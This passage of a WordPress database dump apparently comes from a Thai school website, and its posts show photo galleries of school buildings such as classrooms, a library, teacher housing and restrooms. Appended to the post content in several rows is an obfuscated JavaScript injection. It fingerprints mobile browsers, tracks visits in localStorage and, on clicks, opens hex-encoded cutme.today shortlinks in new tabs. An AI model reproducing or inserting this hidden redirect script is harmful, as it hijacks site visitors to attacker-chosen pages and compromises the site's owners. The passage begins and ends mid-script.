)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ข้อมูลสิ่งก่อสร้าง','','inherit','closed','closed','','609-revision-v1','','','2024-08-07 11:47:17','2024-08-07 04:47:17','',609,'http://pakhaeng.ssk.in.th/?p=638',0,'revision','',0),
(639,1,'2024-08-07 11:48:16','2024-08-07 04:48:16','<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:kadence/advancedgallery {\"uniqueID\":\"609_e70354-bb\",\"ids\":[620,617,618,619],\"type\":\"slider\",\"imagesDynamic\":[{\"id\":620,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=620\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119942_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119942_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119942_0.jpg\",\"width\":750,\"height\":422},{\"id\":617,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=617\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119960_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119960_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119960_0.jpg\",\"width\":750,\"height\":422},{\"id\":618,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=618\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119962_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119962_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119962_0.jpg\",\"width\":750,\"height\":422},{\"id\":619,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=619\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119963_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119963_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119963_0.jpg\",\"width\":750,\"height\":422}],\"kbVersion\":2} /-->\n\n<!-- wp:paragraph {\"align\":\"center\"} -->\n<p class=\"has-text-align-center\"><strong>อาคารพิเศษ 1 ชั้น</strong></p>\n<!-- /wp:paragraph --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:kadence/advancedgallery {\"uniqueID\":\"609_7a2fca-b5\",\"ids\":[622,621],\"type\":\"slider\",\"imagesDynamic\":[{\"id\":622,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=622\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119948_0-1.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119948_0-1-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119948_0-1.jpg\",\"width\":750,\"height\":422},{\"id\":621,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=621\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119969.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119969-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119969.jpg\",\"width\":750,\"height\":422}],\"kbVersion\":2} /-->\n\n<!-- wp:paragraph {\"align\":\"center\"} -->\n<p class=\"has-text-align-center\"><strong>อาคารเรียน สปช. 105/29 ปรับปรุง 2 ชั้น 4 ห้องเรียน </strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph {\"align\":\"center\"} -->\n<p class=\"has-text-align-center\"><strong>(ชั้นล่างโล่ง</strong>)</p>\n<!-- /wp:paragraph --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:kadence/advancedgallery {\"uniqueID\":\"609_72c110-54\",\"ids\":[610,613,612],\"type\":\"slider\",\"imagesDynamic\":[{\"id\":610,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=610\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119951.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119951-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119951.jpg\",\"width\":1024,\"height\":576},{\"id\":613,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=613\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119967_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119967_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119967_0.jpg\",\"width\":750,\"height\":422},{\"id\":612,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=612\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119966_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119966_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119966_0.jpg\",\"width\":750,\"height\":422}],\"kbVersion\":2} /-->\n\n<!-- wp:paragraph {\"align\":\"center\"} -->\n<p class=\"has-text-align-center\"><strong>อาคารเรียน สปช. 104/26 ขนาด 3 ห้องเรียน</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"609_e7f603-c8\",\"ids\":[625,623,624],\"type\":\"slider\",\"imagesDynamic\":[{\"id\":625,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=625\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119950_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119950_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119950_0.jpg\",\"width\":750,\"height\":422},{\"id\":623,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=623\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119968.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119968-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119968.jpg\",\"width\":750,\"height\":422},{\"id\":624,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=624\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119970.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119970-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119970.jpg\",\"width\":750,\"height\":422}],\"kbVersion\":2} /-->\n\n<!-- wp:paragraph {\"align\":\"center\"} -->\n<p class=\"has-text-align-center\"><strong>อาคารห้องสมุด</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"609_7b340e-23\",\"ids\":[633,630,631,632],\"type\":\"slider\",\"imagesDynamic\":[{\"id\":633,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=633\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119945_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119945_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119945_0.jpg\",\"width\":1024,\"height\":576},{\"id\":630,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=630\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119953_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119953_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119953_0.jpg\",\"width\":1024,\"height\":576},{\"id\":631,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=631\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119955_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119955_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119955_0.jpg\",\"width\":1024,\"height\":576},{\"id\":632,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=632\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119956_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119956_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119956_0.jpg\",\"width\":1024,\"height\":576}],\"kbVersion\":2} /-->\n\n<!-- wp:paragraph {\"align\":\"center\"} -->\n<p class=\"has-text-align-center\"><strong>สปช.301/26 (บ้านพักครูเดี่ยว)</strong></p>\n<!-- /wp:paragraph --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:kadence/advancedgallery {\"uniqueID\":\"609_f12de5-af\",\"ids\":[616,614,615],\"type\":\"slider\",\"imagesDynamic\":[{\"id\":616,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=616\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119943_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119943_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119943_0.jpg\",\"width\":750,\"height\":422},{\"id\":614,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=614\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119957_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119957_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119957_0.jpg\",\"width\":1024,\"height\":576},{\"id\":615,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=615\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119959_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119959_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119959_0.jpg\",\"width\":1024,\"height\":576}],\"kbVersion\":2} /-->\n\n<!-- wp:paragraph {\"align\":\"center\"} -->\n<p class=\"has-text-align-center\"><strong>อาคารเรียนอนุบาล</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"609_e50add-00\",\"ids\":[626,627],\"type\":\"slider\",\"imagesDynamic\":[{\"id\":626,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=626\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119971_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119971_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119971_0.jpg\",\"width\":750,\"height\":422},{\"id\":627,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=627\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119973_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119973_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119973_0.jpg\",\"width\":750,\"height\":422}],\"kbVersion\":2} /-->\n\n<!-- wp:paragraph {\"align\":\"center\"} -->\n<p class=\"has-text-align-center\"><strong>ห้องน้ำ สปช.601/26</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"609_5f7dc9-b0\",\"ids\":[634,635,636],\"type\":\"slider\",\"imagesDynamic\":[{\"id\":634,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=634\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119974_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119974_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119974_0.jpg\",\"width\":750,\"height\":422},{\"id\":635,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=635\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119976_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119976_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119976_0.jpg\",\"width\":750,\"height\":422},{\"id\":636,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=636\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119977_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119977_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119977_0.jpg\",\"width\":750,\"height\":422}],\"kbVersion\":2} /-->\n\n<!-- wp:paragraph {\"align\":\"center\"} -->\n<p class=\"has-text-align-center\"><strong>สปช.601/26</strong></p>\n<!-- /wp:paragraph --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g 